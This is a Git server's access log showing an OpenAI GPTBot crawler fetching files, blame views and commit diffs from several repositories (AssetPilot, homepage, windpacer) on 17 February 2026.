"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12449] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:31:14 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16156] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18114] [Gzip 12.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14274] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22844] [Gzip 13.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9507] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11876] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16601] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 23981] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15599] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15600] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 24395] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 24395] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9508] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9510] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" -[17/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/packages" [Client 74.7.227.38] [Length 6402] [Gzip 2.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" -[17/Feb/2026:13:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=followers" [Client 74.7.227.38] [Length 6369] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:13:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 10161] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" -[17/Feb/2026:13:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 12529] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" -[17/Feb/2026:13:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata" [Client 74.7.227.38] [Length 115948] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/semiyearly" [Client 74.7.227.38] [Length 8594] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 10574] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 74.7.227.38] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:13:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13565] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10721] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12970] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 26335] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15238] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 27421] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15237] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 14459] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15215] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 14420] [Gzip 7.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 27423] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 229660] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17141] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 56819] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 56831] [Gzip 12.84] [Sent-to 192.168.0.250] 